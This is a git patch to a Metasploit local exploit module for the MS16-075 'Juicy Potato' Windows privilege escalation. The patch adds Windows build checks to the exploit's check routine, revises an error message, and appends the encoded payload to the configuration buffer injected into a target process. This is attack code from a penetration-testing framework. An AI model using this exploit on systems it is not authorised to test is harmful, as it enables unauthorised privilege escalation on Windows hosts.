From 7653d64c4abd52a6af3654f46ac8ceb89ca2e78a Mon Sep 17 00:00:00 2001 From: phra Date: Fri, 11 Jan 2019 15:38:57 +0100 Subject: [PATCH] fix: improve exploit check --- .../windows/local/ms16_075_reflection_juicy.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb index 7c4c1f1970..dac07bf84b 100644 --- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb +++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb @@ -112,6 +112,14 @@ class MetasploitModule < Msf::Exploit::Local def check privs = client.sys.config.getprivs + win10build = client.sys.config.sysinfo['OS'].match /Windows 10 \(Build (\d+)\)/ + if win10build and win10build[1] > '17134' + return Exploit::CheckCode::Safe + end + win2019build = client.sys.config.sysinfo['OS'].match /Windows 2019 \(Build (\d+)\)/ + if win2019build and win2019build[1] > '17134' + return Exploit::CheckCode::Safe + end if privs.include?('SeImpersonatePrivilege') return Exploit::CheckCode::Appears end @@ -129,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local print_status("#{my_target['Arch']}") verify_arch(my_target) if check == Exploit::CheckCode::Safe - fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege') + fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported') end if my_target.opts['Arch'] == 'x64' dll_file_name = 'juicypotato.x64.dll' @@ -161,6 +169,7 @@ class MetasploitModule < Msf::Exploit::Local configuration += "#{datastore['RPC_IP']}\x00" configuration += "#{datastore['RPC_PORT']}\x00" configuration += "#{datastore['DCOM_IP']}\x00" + configuration += payload.encoded payload_mem = inject_into_process(process, configuration) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation.